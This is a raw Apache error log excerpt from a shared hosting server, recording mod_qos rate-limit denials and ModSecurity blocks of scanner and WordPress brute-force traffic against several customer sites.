[Tue May 26 20:00:33.049674 2026] [qos:error] [pid 106517:tid 106744] [client 45.148.10.120:58044] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuiYZZc2DoU1lPnP1iXAAAAOI
[Tue May 26 20:00:33.049906 2026] [qos:error] [pid 106517:tid 106734] [client 45.148.10.120:46638] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuiYZZc2DoU1lPnP1iXQAAANg
[Tue May 26 20:00:33.050838 2026] [qos:error] [pid 93576:tid 93728] [client 45.148.10.120:35102] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuiWDRMqfxdEDkoswFwAAAABA
[Tue May 26 20:00:33.059270 2026] [qos:error] [pid 93576:tid 93760] [client 45.148.10.120:57922] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuiWDRMqfxdEDkoswFwQAAADA
[Tue May 26 20:00:33.077328 2026] [security2:error] [pid 93576:tid 93820] [client 103.163.220.34:64897] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/header.php"] [unique_id "ahWuiWDRMqfxdEDkoswFxAAAAGw"]
[Tue May 26 20:00:33.187719 2026] [qos:error] [pid 106517:tid 106679] [client 45.148.10.120:55348] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuiYZZc2DoU1lPnP1iZAAAAKE
[Tue May 26 20:00:33.197888 2026] [qos:error] [pid 106517:tid 106752] [client 45.148.10.120:57912] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuiYZZc2DoU1lPnP1iZgAAAOo
[Tue May 26 20:00:33.200403 2026] [qos:error] [pid 106517:tid 106700] [client 45.148.10.120:58044] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuiYZZc2DoU1lPnP1iZwAAALY
[Tue May 26 20:00:33.200488 2026] [qos:error] [pid 93576:tid 93839] [client 45.148.10.120:46670] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuiWDRMqfxdEDkoswFxQAAAH8
[Tue May 26 20:00:33.201228 2026] [qos:error] [pid 93576:tid 93839] [client 45.148.10.120:53552] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuiWDRMqfxdEDkoswFxgAAAH8
[Tue May 26 20:00:33.202924 2026] [qos:error] [pid 106517:tid 106667] [client 45.148.10.120:58056] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuiYZZc2DoU1lPnP1iaAAAAJY
[Tue May 26 20:00:33.208685 2026] [qos:error] [pid 106517:tid 106755] [client 45.148.10.120:46638] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuiYZZc2DoU1lPnP1iaQAAAO0
[Tue May 26 20:00:33.216189 2026] [qos:error] [pid 93576:tid 93730] [client 45.148.10.120:57922] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuiWDRMqfxdEDkoswFxwAAABI
[Tue May 26 20:00:33.227408 2026] [security2:error] [pid 106517:tid 106600] [remote 119.18.52.246:47078] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.52.18.119.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWuiYZZc2DoU1lPnP1iagAAz1A"], referer: https://anujtradingco.com/wp-login.php
[Tue May 26 20:00:33.276823 2026] [security2:error] [pid 106517:tid 106698] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuh4ZZc2DoU1lPnP1hygAAALQ"]
[Tue May 26 20:00:33.284232 2026] [security2:error] [pid 93576:tid 93716] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuh2DRMqfxdEDkoswFGAAAAAQ"]
[Tue May 26 20:00:33.285096 2026] [security2:error] [pid 106517:tid 106743] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuh4ZZc2DoU1lPnP1h2QAAAOE"]
[Tue May 26 20:00:33.286525 2026] [security2:error] [pid 93576:tid 93725] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuh2DRMqfxdEDkoswFHwAAAA0"]
[Tue May 26 20:00:33.288878 2026] [security2:error] [pid 93576:tid 93719] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuh2DRMqfxdEDkoswFIwAAAAc"]
[Tue May 26 20:00:33.292418 2026] [security2:error] [pid 106517:tid 106651] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuh4ZZc2DoU1lPnP1huwAAAIY"]
[Tue May 26 20:00:33.296985 2026] [security2:error] [pid 106517:tid 106753] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuh4ZZc2DoU1lPnP1hyQAAAOs"]
[Tue May 26 20:00:33.301834 2026] [security2:error] [pid 106517:tid 106737] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuh4ZZc2DoU1lPnP1hzgAAANs"]
[Tue May 26 20:00:33.307094 2026] [security2:error] [pid 106517:tid 106668] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuh4ZZc2DoU1lPnP1hzAAAAJc"]
[Tue May 26 20:00:33.320812 2026] [security2:error] [pid 106517:tid 106741] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuh4ZZc2DoU1lPnP1h3gAAAN8"]
[Tue May 26 20:00:33.329705 2026] [security2:error] [pid 106517:tid 106720] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuh4ZZc2DoU1lPnP1h5AAAAMo"]
[Tue May 26 20:00:33.336838 2026] [security2:error] [pid 93576:tid 93734] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuh2DRMqfxdEDkoswFQAAAABY"]
[Tue May 26 20:00:33.339947 2026] [security2:error] [pid 93576:tid 93789] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuh2DRMqfxdEDkoswFOQAAAE0"]
[Tue May 26 20:00:33.343689 2026] [security2:error] [pid 106517:tid 106656] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuh4ZZc2DoU1lPnP1h6AAAAIs"]
[Tue May 26 20:00:33.346170 2026] [security2:error] [pid 106517:tid 106716] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuh4ZZc2DoU1lPnP1h4wAAAMY"]
[Tue May 26 20:00:33.354053 2026] [security2:error] [pid 93576:tid 93785] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuh2DRMqfxdEDkoswFQgAAAEk"]
[Tue May 26 20:00:33.354546 2026] [security2:error] [pid 93576:tid 93765] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuh2DRMqfxdEDkoswFOwAAADU"]
[Tue May 26 20:00:33.356070 2026] [security2:error] [pid 93576:tid 93802] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuh2DRMqfxdEDkoswFPgAAAFo"]
[Tue May 26 20:00:33.397613 2026] [security2:error] [pid 93576:tid 93808] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuiGDRMqfxdEDkoswFnQAAAGA"]
[Tue May 26 20:00:33.404965 2026] [security2:error] [pid 106517:tid 106683] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuiIZZc2DoU1lPnP1iRwAAAKU"]
[Tue May 26 20:00:33.411336 2026] [security2:error] [pid 93576:tid 93792] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuh2DRMqfxdEDkoswFSAAAAFA"]
[Tue May 26 20:00:33.417153 2026] [security2:error] [pid 93576:tid 93758] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuiGDRMqfxdEDkoswFggAAAC4"]
[Tue May 26 20:00:33.419649 2026] [security2:error] [pid 93576:tid 93722] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuiGDRMqfxdEDkoswFhAAAAAo"]
[Tue May 26 20:00:33.423775 2026] [security2:error] [pid 93576:tid 93717] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuiGDRMqfxdEDkoswFgAAAAAU"]
[Tue May 26 20:00:33.423973 2026] [security2:error] [pid 93576:tid 93798] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuiGDRMqfxdEDkoswFhgAAAFY"]
[Tue May 26 20:00:33.426613 2026] [security2:error] [pid 106517:tid 106674] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuiIZZc2DoU1lPnP1iQgAAAJ0"]
[Tue May 26 20:00:33.427389 2026] [security2:error] [pid 106517:tid 106750] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuiIZZc2DoU1lPnP1iJAAAAOg"]
[Tue May 26 20:00:33.453435 2026] [security2:error] [pid 93576:tid 93796] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuiGDRMqfxdEDkoswFngAAAFQ"]
[Tue May 26 20:00:33.453487 2026] [security2:error] [pid 93576:tid 93736] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuiGDRMqfxdEDkoswFigAAABg"]
[Tue May 26 20:00:33.455460 2026] [security2:error] [pid 106517:tid 106660] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuiIZZc2DoU1lPnP1iQQAAAI8"]
[Tue May 26 20:00:33.462153 2026] [security2:error] [pid 93576:tid 93804] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuiGDRMqfxdEDkoswFogAAAFw"]
[Tue May 26 20:00:33.464960 2026] [security2:error] [pid 93576:tid 93776] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuiGDRMqfxdEDkoswFjQAAAEA"]
[Tue May 26 20:00:33.468384 2026] [security2:error] [pid 93576:tid 93743] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuiGDRMqfxdEDkoswFpgAAAB8"]
[Tue May 26 20:00:33.530527 2026] [security2:error] [pid 93576:tid 93833] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWuiWDRMqfxdEDkoswFwwAAAHk"]
[Tue May 26 20:00:33.567713 2026] [security2:error] [pid 93576:tid 93786] [client 103.163.220.31:20851] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/ahax.php"] [unique_id "ahWuiWDRMqfxdEDkoswGCAAAAEo"]
[Tue May 26 20:00:33.580217 2026] [qos:error] [pid 106517:tid 106695] [client 45.148.10.120:46660] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuiYZZc2DoU1lPnP1inAAAALE
[Tue May 26 20:00:33.581178 2026] [qos:error] [pid 93576:tid 93741] [client 45.148.10.120:53566] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuiWDRMqfxdEDkoswGEQAAAB0
[Tue May 26 20:00:33.581558 2026] [qos:error] [pid 93576:tid 93826] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuiWDRMqfxdEDkoswGDwAAAHI
[Tue May 26 20:00:33.586890 2026] [qos:error] [pid 93576:tid 93776] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuiWDRMqfxdEDkoswGEwAAAEA
[Tue May 26 20:00:33.586892 2026] [qos:error] [pid 93576:tid 93819] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=50.87.254.159, id=ahWuiWDRMqfxdEDkoswGFAAAAGs
[Tue May 26 20:00:33.609685 2026] [qos:error] [pid 106517:tid 106771] [client 45.148.10.120:58028] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuiYZZc2DoU1lPnP1inwAAAP0
[Tue May 26 20:00:33.615258 2026] [qos:error] [pid 93576:tid 93714] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuiWDRMqfxdEDkoswGGAAAAAI
[Tue May 26 20:00:33.617516 2026] [qos:error] [pid 93576:tid 93741] [client 45.148.10.120:53574] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuiWDRMqfxdEDkoswGGgAAAB0
[Tue May 26 20:00:33.618556 2026] [qos:error] [pid 93576:tid 93786] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuiWDRMqfxdEDkoswGGwAAAEo
[Tue May 26 20:00:33.627611 2026] [qos:error] [pid 93576:tid 93819] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuiWDRMqfxdEDkoswGHgAAAGs
[Tue May 26 20:00:33.732411 2026] [qos:error] [pid 106517:tid 106713] [client 45.148.10.120:46660] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuiYZZc2DoU1lPnP1ioQAAAMM
[Tue May 26 20:00:33.735237 2026] [qos:error] [pid 106517:tid 106664] [client 45.148.10.120:46724] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuiYZZc2DoU1lPnP1iogAAAJM
[Tue May 26 20:00:33.735400 2026] [qos:error] [pid 93576:tid 93747] [client 45.148.10.120:53566] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuiWDRMqfxdEDkoswGIwAAACM
[Tue May 26 20:00:33.738997 2026] [qos:error] [pid 93576:tid 93727] [client 45.148.10.120:53542] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuiWDRMqfxdEDkoswGJAAAAA8
[Tue May 26 20:00:33.739772 2026] [qos:error] [pid 106517:tid 106666] [client 45.148.10.120:57862] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuiYZZc2DoU1lPnP1iowAAAJU
[Tue May 26 20:00:33.764005 2026] [qos:error] [pid 106517:tid 106726] [client 45.148.10.120:58028] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuiYZZc2DoU1lPnP1ipAAAANA
[Tue May 26 20:00:33.765521 2026] [qos:error] [pid 106517:tid 106723] [client 45.148.10.120:46708] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuiYZZc2DoU1lPnP1ipQAAAM0
[Tue May 26 20:00:33.769708 2026] [qos:error] [pid 93576:tid 93786] [client 45.148.10.120:35204] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuiWDRMqfxdEDkoswGJQAAAEo
[Tue May 26 20:00:33.778444 2026] [qos:error] [pid 93576:tid 93825] [client 45.148.10.120:53574] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuiWDRMqfxdEDkoswGKAAAAHE
[Tue May 26 20:00:33.780708 2026] [qos:error] [pid 93576:tid 93823] [client 45.148.10.120:35140] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuiWDRMqfxdEDkoswGKQAAAG8
[Tue May 26 20:00:33.886848 2026] [qos:error] [pid 106517:tid 106687] [client 45.148.10.120:46660] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuiYZZc2DoU1lPnP1ipwAAAKk
[Tue May 26 20:00:33.887454 2026] [qos:error] [pid 106517:tid 106674] [client 45.148.10.120:46724] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuiYZZc2DoU1lPnP1iqAAAAJ0
[Tue May 26 20:00:33.889073 2026] [qos:error] [pid 93576:tid 93823] [client 45.148.10.120:53542] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuiWDRMqfxdEDkoswGMgAAAG8
[Tue May 26 20:00:33.889741 2026] [qos:error] [pid 93576:tid 93825] [client 45.148.10.120:53566] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuiWDRMqfxdEDkoswGMQAAAHE
[Tue May 26 20:00:33.898430 2026] [qos:error] [pid 106517:tid 106651] [client 45.148.10.120:57862] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuiYZZc2DoU1lPnP1iqQAAAIY
[Tue May 26 20:00:33.918307 2026] [qos:error] [pid 106517:tid 106748] [client 45.148.10.120:58028] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuiYZZc2DoU1lPnP1iqgAAAOY
[Tue May 26 20:00:33.919167 2026] [qos:error] [pid 93576:tid 93819] [client 45.148.10.120:35204] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuiWDRMqfxdEDkoswGMwAAAGs
[Tue May 26 20:00:33.919597 2026] [qos:error] [pid 106517:tid 106699] [client 45.148.10.120:46708] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuiYZZc2DoU1lPnP1iqwAAALU
[Tue May 26 20:00:33.931082 2026] [qos:error] [pid 93576:tid 93833] [client 45.148.10.120:53574] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuiWDRMqfxdEDkoswGNAAAAHk
[Tue May 26 20:00:34.074427 2026] [security2:error] [pid 93576:tid 93784] [client 103.163.220.49:27787] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-admin/css/colors/light/"] [unique_id "ahWuimDRMqfxdEDkoswGOwAAAEg"]
[Tue May 26 20:00:34.243326 2026] [qos:error] [pid 93576:tid 93716] [client 45.148.10.120:53600] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuimDRMqfxdEDkoswGPgAAAAQ
[Tue May 26 20:00:34.277859 2026] [security2:error] [pid 93576:tid 93721] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuiGDRMqfxdEDkoswFpQAAAAk"]
[Tue May 26 20:00:34.283152 2026] [security2:error] [pid 93576:tid 93756] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuiGDRMqfxdEDkoswFpAAAACw"]
[Tue May 26 20:00:34.288113 2026] [security2:error] [pid 93576:tid 93724] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuiGDRMqfxdEDkoswFoQAAAAw"]
[Tue May 26 20:00:34.293008 2026] [security2:error] [pid 93576:tid 93803] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuiGDRMqfxdEDkoswFqgAAAFs"]
[Tue May 26 20:00:34.299956 2026] [security2:error] [pid 93576:tid 93782] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuiGDRMqfxdEDkoswFqQAAAEY"]
[Tue May 26 20:00:34.303976 2026] [security2:error] [pid 93576:tid 93762] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuiGDRMqfxdEDkoswFowAAADI"]
[Tue May 26 20:00:34.304541 2026] [security2:error] [pid 93576:tid 93749] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuiGDRMqfxdEDkoswFqAAAACU"]
